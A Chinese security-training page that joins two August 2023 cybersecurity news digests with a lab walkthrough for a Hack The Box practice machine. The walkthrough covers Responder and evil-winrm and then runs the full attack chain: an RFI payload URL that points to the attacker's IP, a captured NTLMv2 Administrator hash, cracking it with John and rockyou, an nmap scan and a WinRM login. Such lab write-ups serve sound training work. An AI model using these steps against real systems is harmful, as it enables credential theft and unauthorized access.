https://www.bleepingcomputer.com/news/security/major-us-energy-org-targeted-in-qr-code-phishing-attack/ 据观察,网络钓鱼活动主要针对美国一家著名能源公司,利用二维码将恶意电子邮件放入收件箱并绕过安全措施。此次攻击活动引发的 1000 封电子邮件中,大约有三分之一 (29%) 针对一家大型美国能源公司,而其余尝试则针对制造业 (15%)、保险业 (9%)、技术 (7%)、和金融服务(6%)。据发现该活动的研究人员称,这是首次如此大规模地使用二维码,表明更多的网络钓鱼攻击者可能正在测试其作为攻
2、网络代理提供商利用恶意软件传播感染住宅网络牟利
https://cybersecurity.att.com/blogs/labs-research/proxynation-the-dark-nexus-between-proxy-apps-and-malware 研究人员发现了一项大规模活动,该活动向至少40万个 Windows 系统提供了代理服务器应用程序。这些设备在未经用户同意的情况下充当住宅出口节点,并且一家公司正在对通过这些机器运行的代理流量进行收费。住宅代理对于网络犯罪分子来说很有价值,因为它们可以帮助部署来自新 IP 地址的大规模撞库攻击。它们还有合法目的,例如广告验证、数据抓取、网站测试或增强隐私的重新路由。一些代理公司出售
3、Citrix ShareFile存在严重漏洞可被广泛利用
https://www.cisa.gov/news-events/alerts/2023/08/16/cisa-adds-one-known-exploited-vulnerability-catalog CISA 警告称,一个被追踪为 CVE-2023-24489 的关键 Citrix ShareFile 安全文件传输漏洞正成为未知攻击者的攻击目标,并已将该漏洞添加到其已知的已知安全漏洞目录中。Citrix ShareFile(也称为 Citrix Content Collaboration)是一种托管文件传输 SaaS 云存储解决方案,允许客户和员工安全地上传和下载文件。该服务还提供“存
4、PowerShell Gallery存在漏洞可被利用导致供应链攻击
https://blog.aquasec.com/powerhell-active-flaws-in-powershell-gallery-expose-users-to-attacks PowerShell Gallery 中的漏洞可能会被攻击者利用,对注册表用户发起供应链攻击。PowerShell Gallery由 Microsoft 维护,是一个用于共享和获取 PowerShell 代码的中央存储库,其中包括 PowerShell 模块、脚本和所需状态配置 (DSC) 资源。该注册表拥有 11829 个独特的软件包,总共 244615 个软件包。研究人员发现的问题与该服务围绕包名称的宽
5、文件匿名共享网站Anonfile因大量被滥用行为而关闭
https://www.bleepingcomputer.com/news/security/file-sharing-site-anonfiles-shuts-down-due-to-overwhelming-abuse/ Anonfiles 是一项流行的匿名共享文件服务,因无法再应对用户的大量滥用后已关闭。Anonfiles 是一个匿名文件共享网站,允许人们匿名共享文件,而无需记录其活动。然而,它很快成为攻击者最流行的文件共享服务之一,用于共享被盗数据、 被盗凭证和受版权保护的材料的样本。
6、研究人员演示了一种iOS 16假飞行模式的持久性技术
https://securityaffairs.com/149597/mobile-2/airplane-mode-apple-ios-16-exploit.html Jamf 威胁实验室的研究人员在 iOS 16 上开发了一种利用后持久性技术,欺骗受害者相信该设备处于功能正常的飞行模式。事实上,研究人员植入了一种人工飞行模式,可以修改用户界面以显示飞行模式图标,并切断除恶意攻击者的应用程序之外的所有应用程序的互联网连接。使用此技巧,即使用户认为手机处于离线状态,攻击者也可以保持对手机的访问。研究人员指出,该技术尚未用于野外攻击。
7、谷歌将人工智能引入Fuzz测试,结果令人大开眼界
https://www.securityweek.com/google-brings-ai-magic-to-fuzz-testing-with-eye-opening-results/ 谷歌在其 OSS-FUZZ 项目(一项免费服务,为开源项目运行模糊器并私下向开发人员发出检测到的错误的警报)中添加了生成式人工智能技术,并发现当使用 LLM 创建新的模糊目标时,代码覆盖率得到了巨大的改善。
8、LABRAT 行动针对 GitLab 开展恶意挖矿和代理劫持活动
https://sysdig.com/blog/labrat-cryptojacking-proxyjacking-campaign/ https://sysdig.com/threat-research/( TRT) 最近发现了一种新的、出于经济动机的操作,称为 LABRAT。该攻击者的一个明显目标是通过代理劫持和加密货币挖矿来赚取收入。
9、微软云安全问题引发美国国土安全部安全审查
https://www.darkreading.com/cloud/microsoft-cloud-woes-inspire-dhs-security-review 美国国土安全部 (DHS) 近期启动了针对云计算环境的网络攻击威胁的调查,微软在处理针对其 Azure 云基础设施的重大攻击方面将面临严格审查。
10、3 个主要电子邮件安全标准被证明漏洞百出
https://www.darkreading.com/vulnerabilities-threats/3-major-email-security-standards-falling-down-on-the-job 安全公司 Cloudflare 发现,绝大多数欺诈性邮件至少通过了三个主要电子邮件安全标准(SPF、DKIM、DMARC)之一的审查。
免责声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
网络安全日报 2023年08月17日
1、黑客针对LinkedIn账户发起网络攻击
https://cyberint.com/blog/research/linkedin-accounts-under-attack-how-to-protect-yourself/ 许多 LinkedIn 用户的帐户被接管或锁定,并且无法通过 LinkedIn 支持找回账户。有些用户甚至被迫支付赎金才能重新获得控制权,或者面临账户被永久删除的情况。攻击者似乎正在使用泄露的凭据或暴力破解来尝试控制大量 LinkedIn 帐户。对于受到强密码或双因素身份验证适当保护的帐户,多次接管尝试导致平台实施临时帐户锁定作为保护措施。然后,系统会提示这些帐户的所有者通过提供附加信息来验证所有权,并允许再次登
2、近两千台Citrix NetScaler服务器被植入后门
https://blog.fox-it.com/2023/08/15/approximately-2000-citrix-netscalers-backdoored-in-mass-exploitation-campaign/ 攻击者利用被跟踪为 CVE-2023-3519 的关键严重性远程代码执行漏洞,在一场大规模黑客活动中入侵了近 2000 台 Citrix NetScaler 服务器。研究人员表示,截至 8 月 14 日,在已发现的受感染服务器中,仍有 1828 台服务器存在后门,其中 1247 台服务器在黑客植入 Webshell 后已得到修补。
3、KmsdBot恶意软件针对物联网设备发起攻击
https://www.akamai.com/blog/security-research/updated-kmsdbot-binary-targeting-iot 研究人员跟踪KmsdBot恶意软件时,发现了针对物联网 (IoT) 设备的更新的 Kmsdx 二进制文件。该二进制文件现在包括对 telnet 扫描的支持以及对更多 CPU 架构的支持,从而扩展了其攻击能力和攻击面。这些更新的功能自 2023 年 7 月中旬以来才出现。该恶意软件针对私人游戏服务器、云托管提供商以及某些政府和教育网站。该恶意软件的活动表明,易受攻击的物联网设备仍然是互联网上的重大威胁,因此更加需要定期采取安全措施
4、Ivanti Avalanche存在堆栈缓冲区溢出漏洞
https://www.bleepingcomputer.com/news/security/ivanti-avalanche-impacted-by-critical-pre-auth-stack-buffer-overflows/ 两个基于堆栈的缓冲区溢出(统称为 CVE-2023-32560)影响了 Ivanti Avalanche,这是一种企业移动管理 (EMM) 解决方案,旨在管理、监控和保护各种移动设备。这些漏洞被评为严重漏洞(CVSS v3:9.8),无需用户身份验证即可远程利用,可能允许攻击者在目标系统上执行任意代码。该漏洞影响 WLAvalancheService.exe
5、谷歌发布可抵御量子攻击的安全密钥实施
https://www.securityweek.com/google-releases-security-key-implementation-resilient-to-quantum-attacks/ 谷歌周二发布了它所说的第一个 FIDO2 安全密钥实施方案,该实施方案应该能够抵抗量子攻击。
6、谷歌发布Chrome 116,修复了26个漏洞
https://www.securityweek.com/chrome-116-patches-26-vulnerabilities/ 谷歌周二宣布向稳定渠道发布 Chrome 116,其中包含 26 个漏洞的补丁,其中包括外部研究人员报告的 21 个漏洞。在外部报告的错误中,有八个错误的严重程度为“高”,其中大多数是内存安全问题。
7、普华永道因MOVEit漏洞泄露银行8万名储户的信息
https://www.freebuf.com/news/375127.html 8月14日,波多黎各自治区最大的银行——人民银行向缅因州司法部长提交了一份客户信息泄露报告。该报告指出,由于供应商普华永道使用的MOVEit软件存在安全漏洞,导致银行82217名储户的个人信息被泄露。
8、全球最大金矿和钼矿厂遭网络攻击:生产受到部分影响
https://www.secrss.com/articles/57787 全球最大金矿、最大钼生产商、主要铜生产商自由港公司遭受网络攻击,部分系统被迫关闭,对生产造成了一定影响。
9、Discord.io 在黑客窃取76W用户数据后确认数据泄露
https://www.bleepingcomputer.com/news/security/discordio-confirms-breach-after-hacker-steals-data-of-760k-users/ Discord.io 自定义邀请服务在遭受数据泄露后暂时关闭,暴露了 760,000 名成员的信息。
10、信息窃取恶意软件Raccoon Stealer以全新隐身版本正式“回归”
https://www.freebuf.com/news/375011.html 近日,Raccoon Stealer 信息窃取恶意软件的开发者结束其在黑客论坛长达 6 个月的停滞期,向网络犯罪分子推广该恶意软件的 2.3.0 全新版本。Raccoon 是最知名、使用最广泛的信息窃取恶意软件之一,自 2019 年以来一直通过订阅模式以 200 美元/月的价格出售给威胁行为者。
免责声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
Responder与evil-winRM配合远程登录Windows
0x01.evil-winRM
0x01.1概述
在使用和介绍Responder之前,先来了解一下evil-winRM:
evil-winrm是Windows远程管理(WinRM) Shell的终极版本。
Windows远程管理是WS 管理协议的 Microsoft 实施,该协议是基于标准 SOAP、不受防火墙影响的协议,允许不同供应商的硬件和操作系统相互操作。而微软将其包含在他们的系统中,是为了便于系统管理员在日常工作中,远程管理服务器,或通过脚本同时管理多台服务器,以提高他们的工作效率。
此程序可在启用此功能的任何Microsoft Windows服务器上使用(通常端口为5985),当然只有在你具有使用凭据和权限时才能使用。因此,我们说它可用于黑客攻击的后利用/渗透测试阶段。相对于攻击者来说,这个程序能为他们提供更好更简单易用的功能。当然,系统管理员也可以将其用于合法目的,但其大部分功能都集中于黑客攻击/渗透测试。
0x01.2安装和使用
安装:
方法一
sudo apt install evil-winrm
方法二:
git clone https://github.com/Hackplayers/evil-winrm.git
方法三:
gem install evil-winrm
使用:
首先查看帮助文档
root@kali:~# evil-winrm -h
Evil-WinRM shell v3.5
用法:evil-winrm -i IP -u USER [-s SCRIPTS_PATH] [-e EXES_PATH] [-P PORT] [-p PASS] [-H HASH] [-U URL] [-S] [-c PUBLIC_KEY_PATH ] [-k PRIVATE_KEY_PATH ] [-r 领域] [--spn SPN_PREFIX] [-l]
-S, --ssl 启用 ssl
-c, --pub-key PUBLIC_KEY_PATH 公钥证书的本地路径
-k, --priv-key PRIVATE_KEY_PATH 私钥证书的本地路径
-r, --realm DOMAIN Kerberos auth,还必须使用此格式在 /etc/krb5.conf 文件中设置 -> CONTOSO.COM = { kdc = fooserver.contoso.com }
-s, --scripts PS_SCRIPTS_PATH Powershell 脚本本地路径
--spn SPN_PREFIX Kerberos 身份验证的 SPN 前缀(默认 HTTP)
-e, --executables EXES_PATH C# 可执行文件本地路径
-i, --ip IP 远程主机IP或主机名。 Kerberos 身份验证的 FQDN(必需)
-U, --url URL 远程 url 端点(默认 /wsman)
-u, --user USER 用户名(如果不使用 kerberos,则需要)
-p, --password PASS 密码
-H, --hash HASH NTHash
-P, --port PORT 远程主机端口(默认5985)
-V, --version 显示版本
-n, --no-colors 禁用颜色
-N, --no-rpath-completion 禁用远程路径完成
-l, --log 记录 WinRM 会话
-h, --help 显示此帮助消息
0x02.Responder
0x02.1 概念
响应 LLMNR、NBT-NS 和 MDNS 投毒者。 它将根据名称后缀回答特定的 NBT-NS(NetBIOS 名称服务)查询(请参阅:http://support.microsoft.com/kb/163409)。默认情况下,该工具将仅响应适用于 SMB 的文件服务器服务请求。
0x02.2 特性
内置 SMB 身份验证服务器
默认情况下支持具有扩展安全性 NTLMSSP 的 NTLMv1、NTLMv2 哈希。 已成功测试从 Windows 95 到 Server 2012 RC、Samba 和 Mac OSX Lion。 NT4 支持明文密码,当设置--lm选项时,LM 哈希降级。该工具启动时默认启用此功能。
内置 MSSQL 身份验证服务器
为了将 SQL 身份验证重定向到此工具,您需要为 Windows Vista 之前的系统设置选项 -r(用于 SQL Server 查找的 NBT-NS 查询使用工作站服务名称后缀)(LLMNR 将用于 Vista 和 更高)。 该服务器支持 NTLMv1、LMv2 哈希。 此功能已在 Windows SQL Server 2005 和 2008 上成功测试。
内置 HTTP 身份验证服务器
为了将 HTTP 身份验证重定向到此工具,您需要为早于 Vista 的 Windows 版本设置选项 -r(用于 HTTP 服务器查找的 NBT-NS 查询使用工作站服务名称后缀发送)。 对于 Vista 及更高版本,将使用 LLMNR。 该服务器支持 NTLMv1、NTLMv2 哈希和基本身份验证。 该服务器已在 IE 6 至 IE 10、Firefox、Chrome、Safari 上成功测试。
注意:此模块也适用于从 Windows WebDav 客户端 (WebClient) 发出的 WebDav NTLM 身份验证。 您现在可以将自定义文件发送给受害者。
内置 HTTPS 身份验证服务器
与上面相同。 文件夹 certs/ 包含 2 个默认密钥,其中包括一个虚拟私钥。 这是故意的,目的是让 Responder 开箱即用。 添加了一个脚本,以防您需要生成自己的自签名密钥对。
内置 LDAP 身份验证服务器
为了将 LDAP 身份验证重定向到此工具,您需要为早于 Vista 的 Windows 版本设置选项 -r(用于 HTTP 服务器查找的 NBT-NS 查询使用工作站服务名称后缀发送)。 对于 Vista 及更高版本,将使用 LLMNR。 该服务器支持 NTLMSSP 哈希和简单身份验证(明文身份验证)。 该服务器已在 Windows 支持工具"ldp"和 LdapAdmin 上成功测试。
内置 FTP、POP3、IMAP、SMTP 身份验证服务器
该模块将收集明文凭据
内置 DNS 服务器
该服务器将回答 A 类查询。 当它与 ARP 欺骗结合起来时,这真的很方便。
内置 WPAD 代理服务器
如果启用了“自动检测设置”,此模块将捕获网络上启动 Internet Explorer 的任何人的所有 HTTP 请求。 该模块非常有效。 您可以在 Responder.conf 中配置自定义 PAC 脚本,并将 HTML 注入服务器的响应中。 请参阅 Responder.conf。
浏览器监听器
该模块允许在隐身模式下找到 PDC。
指纹识别
当使用选项 -f时,响应程序将对发出 LLMNR/NBT-NS 查询的每个主机进行指纹识别。 所有采集模块在指纹模式下仍然可以工作。
ICMP 重定向
python tools/Icmp-Redirect.py
适用于 Windows XP/2003 及更早版本上的 MITM 域成员。 这种攻击与 DNS 模块相结合非常有效。
流氓 DHCP
python tools/DHCP.py
DHCP 通知欺骗。 允许您让真正的 DHCP 服务器发布 IP 地址,然后发送 DHCP Inform 应答以将您的 IP 地址设置为主 DNS 服务器,以及您自己的 WPAD URL。
分析模式
该模块允许您查看网络上的 NBT-NS、BROWSER、LLMNR、DNS 请求,而不会破坏任何响应。 此外,您还可以被动映射域、MSSQL 服务器、工作站,看看 ICMP 重定向攻击在您的子网上是否可行。
0x02.3 Responder欺骗原理
在使用Responder之前,我们要先了解windwos默认开启的三种协议,这三种协议分别是链路本地多播名称解析(LLMNR)、名称服务器(NBNS) 协议和多播DNS(mdns)协议。
LLMNR
链路本地多播名称解析(LLMNR)是一个基于域名系统(DNS)数据包格式的协议,IPv4和IPv6的主机可以通过此协议对同一本地链路上的主机执行名称解析。Windows 操作系统从 Windows Vista开始就内嵌支持,Linux系统也通过systemd实现了此协议。它通过UDP 5355端口进行通信,且LLMNR支持IPV6。
NBNS
网络基本输入/输出系统(NetBIOS) 名称服务器(NBNS) 协议是 TCP/IP 上的 NetBIOS (NetBT) 协议族的一部分,它在基于 NetBIOS 名称访问的网络上提供主机名和地址映射方法。通过UDP 137端口进行通信,但NBNS不支持IPV6。
mDNS
在计算机网络中 ,多播DNS( mDNS )协议将主机名解析为不包含本地名称服务器的小型网络中的IP地址。 它是一种零配置服务,使用与单播域名系统(DNS)基本相同的编程接口,数据包格式和操作语义。 虽然Stuart Cheshire将mDNS设计为独立协议,但它可以与标准DNS服务器协同工作。它通过UDP 5353端口进行通信,且mDNS也支持IPV6。
目前仅有windows 10以上的系统支持mdns,经测试发现,禁用了llmnr后mdns也会被禁用。
总的来说,以上几种协议在windows中都是默认启用的,主要作用都是在DNS服务器解析失败后,尝试对windows主机名称进行解析,正因为默认启用、且实现方式又类似于ARP协议,并没有一个认证的过程,所以就会引发各种基于这两种协议的欺骗行为,而Responder正是通过这种方式,欺骗受害机器,并使受害机器在后续认证中发送其凭证。
0x02.4 使用方法
root@kali:~#responder -h
用法:responder -I eth0 -w -d
或者:
responder -I eth0 -wd
选项:
--version 显示程序的版本号并退出
-h, --help 显示此帮助消息并退出
-A, --analyze 分析模式。 此选项允许您查看NBT-NS,
BROWSER、LLMNR 请求没有响应。
-I eth0,--接口=eth0
要使用的网络接口,可以使用“ALL”作为
所有接口的通配符
-i 10.0.0.21,--ip=10.0.0.21
要使用的本地 IP(仅适用于 OSX)
-6 2002:c0a8:f7:1:3ba8:aceb:b1a9:81ed, --externalip6=2002:c0a8:f7:1:3ba8:aceb:b1a9:81ed
使用其他 IPv6 地址对所有请求进行毒害
响应者之一。
-e 10.0.0.22, --externalip=10.0.0.22
使用其他 IP 地址毒害所有请求
响应者之一。
-b, --basic 返回基本 HTTP 身份验证。 默认值:NTLM
-d, --DHCP 启用 DHCP 广播请求的应答。 这
选项将在 DHCP 响应中注入 WPAD 服务器。
默认值:假
-D, --DHCP-DNS 该选项将在 DHCP 中注入 DNS 服务器
响应,否则将添加 WPAD 服务器。
默认值:假
-w, --wpad 启动 WPAD 恶意代理服务器。 默认值为
错误的
-u UPSTREAM_PROXY, --upstream-proxy=UPSTREAM_PROXY
恶意 WPAD 代理使用的上游 HTTP 代理
传出请求(格式:主机:端口)
-F, --ForceWpadAuth 对 wpad.dat 文件强制进行 NTLM/Basic 身份验证
恢复。 这可能会导致登录提示。 默认:
错误的
-P, --ProxyAuth 强制 NTLM(透明)/基本(提示)
代理的身份验证。 WPAD 不需要
在。 这个选项非常有效。 默认值:假
--lm 强制 Windows XP/2003 和 LM 哈希降级
早些时候。 默认值:假
--disable-ess 强制 ESS 降级。 默认值:假
-v, --verbose 增加详细程度。
0x03 靶场实战--Responder与evil-winRM配合远程登录windows
测试环境:
kali (攻击机) 192.168.154.128
vpn接入内网环境: ip -> 10.10.14.115
HTB靶机 windows 10 (受害机) 10.129.48.161
开启靶机
前置的步骤简单过一下:
TASK 1
When visiting the web service using the IP address, what is the domain that we are being redirected to?
unika.htb
直接curl探测一下就行
访问域名需要在本地的hosts文件就行一个配置:
TASK 2
Which scripting language is being used on the server to generate webpages?
PHP
直接使用wappalyzer插件即可
TASK 3
What is the name of the URL parameter which is used to load different language versions of the webpage?
page
查看网页源代码:
TASK 4
Which of the following values for the page parameter would be an example of exploiting a Local File Include (LFI) vulnerability: "french.html", "//10.10.14.6/somefile", "../../../../../../../../windows/system32/drivers/etc/hosts", "minikatz.exe"
../../../../../../../../windows/system32/drivers/etc/hosts
这里熟悉文件包含漏洞(FI)师傅能直接get到点:
TASK 5
Which of the following values for the page parameter would be an example of exploiting a Remote File Include (RFI) vulnerability: "french.html", "//10.10.14.6/somefile", "../../../../../../../../windows/system32/drivers/etc/hosts", "minikatz.exe"
//10.10.14.6/somefile
这里和上一问同理
TASK 6
What does NTLM stand for?
NT (New Technology) LAN Manager (NTLM)
查阅Wiki百科就行(可以往下深入了解,这是内网的开始......
TASK 7
Which flag do we use in the Responder utility to specify the network interface?
-I
通过上面的帮助文档可以知道
TASK 8
There are several tools that take a NetNTLMv2 challenge/response and try millions of passwords to see if any of them generate the same response. One such tool is often referred to as john, but the full name is what?.
John the Ripper
也是查阅Wiki百科即可
本文的关键操作,可直接跳至此处
接下来将是本文的重点操作:
首先查看一下自身ip(vpn),并开启监听
开启监听:responder -I tun0 -w -d
接着利用web端的远程文件包含漏洞(RFI)访问我自身(10.10.14.115)的任意文件,进行一个Hash泄露
payload:
http://unika.htb/index.php?page=//10.10.14.115/somefile
Responder就可以捕获到来自受害机(10.129.48.161)带有用户的密码(password)的Hash值
Administrator::RESPONDER:9baf19c29ef21567:761FED4C7E3DB9BCFEF3E747E797B10D:010100000000000000E56ED168C8D901D119B9B66118B37A00000000020008004E0044004200450001001E00570049004E002D004C004C0047004200590033003100340035005800510004003400570049004E002D004C004C004700420059003300310034003500580051002E004E004
将这段字符串保存到一个txt文件中,接下来使用JHON进行一个Hash爆破:
john -w=/usr/share/wordlists/rockyou.txt admin.txt
能够获取到Administrator用户的密码为:badminton
TASK 9
What is the password for the administrator user?
badminton
TASK 10
We'll use a Windows service (i.e. running on the box) to remotely access the Responder machine using the password we recovered. What port TCP does it listen on?
5985
使用nmap进行一个开放端口探测即可:
nmap -p- --min-rate 1000 -sV 10.129.48.161
拿到用户的账户和密码之后就到了一开始所提到的evil-winRM的使用了
evil-winrm -i 10.129.48.161 -u administrator -p badminton
这样就可以远程登录windows服务器啦,接下来我们能做到的事儿有很多。
第一步肯定是找题目需要的flag
找到我们需要的flag文件只是最基础的,别着急提交,不然就浪费这个练习工具的好机会了
可以多试试几个命令:
menu:加载Invoke-Binary和l04d3r-LoadDll函数。当加载ps1时,会显示其所有功能。
download:下载远程文件到本地,如果远程文件在当前目录中,则不需要local_path。
download local_path remote_path
这里可以尝试一下下载flag.txt
upload:从本地(kali)上传文件到目标机器,如果本地文件与evil-winrm.rb文件位于同一目录中,则不需要remote_path。
upload local_path remote_path
这里可以试着传一个txt文件
Invoke-Binary:允许在内存中执行从c#编译的exe。该名称可使用tab键自动补全,最多允许3个参数。可执行文件必须在-e参数设置的路径中。
这里由于我在连接时并未指定exe的路径所以这里没法正常执行命令。
services:列出所有服务(无需管理员权限)
加载 powershell 脚本
要加载ps1文件,你只需键入名称(可以使用tab自动补全)。脚本必须位于-s参数中设置的路径中。再次键入menu并查看加载的功能。
这里我没指定路径所以是没有powershell脚本的,所以没法正常演示。
最后
本次的分享就到这儿结束了,当然还有很多的操作和细节没有能够展示到,后续就留给师傅们去探索了。
第2页 第3页 第4页 第5页 第6页 第7页 第8页 第9页 第10页 第11页 第12页 第13页 第14页 第15页 第16页 第17页 第18页 第19页 第20页 第21页 第22页 第23页 第24页 第25页 第26页 第27页 第28页 第29页 第30页 第31页 第32页 第33页 第34页 第35页 第36页 第37页 第38页 第39页 第40页 第41页 第42页 第43页 第44页 第45页 第46页 第47页 第48页 第49页 第50页 第51页 第52页 第53页 第54页 第55页 第56页 第57页 第58页 第59页 第60页 第61页 第62页 第63页 第64页 第65页 第66页 第67页 第68页 第69页 第70页 第71页 第72页 第73页 第74页 第75页 第76页 第77页 第78页 第79页 第80页 第81页 第82页 第83页 第84页 第85页 第86页 第87页 第88页 第89页 第90页 第91页 第92页 第93页 第94页 第95页 第96页 第97页 第98页 第99页 第100页 第101页 第102页 第103页 第104页 第105页 第106页 第107页 第108页 第109页 第110页 第111页 第112页 第113页 第114页 第115页 第116页 第117页 第118页 第119页 第120页 第121页 第122页 第123页 第124页 第125页 第126页 第127页 第128页 第129页 第130页 第131页 第132页 第133页 第134页 第135页 第136页 第137页 第138页 第139页 第140页 第141页 第142页 第143页 第144页 第145页 第146页 第147页 第148页 第149页 第150页 第151页 第152页 第153页 第154页 第155页 第156页 第157页 第158页 第159页 第160页 第161页 第162页 第163页 第164页 第165页 第166页 第167页 第168页 第169页 第170页 第171页 第172页 第173页 第174页 第175页 第176页 第177页 第178页 第179页 第180页 第181页 第182页 第183页 第184页 第185页 第186页 第187页 第188页 第189页 第190页 第191页 第192页 第193页 第194页 第195页 第196页 第197页 第198页 第199页 第200页 第201页 第202页 第203页 第204页 第205页 第206页 第207页 第208页 第209页 第210页 第211页
蚁景网安学院火热招生中,限时领取大额优惠券,快来抢购吧~
扫码咨询客服了解招生最新内容和活动

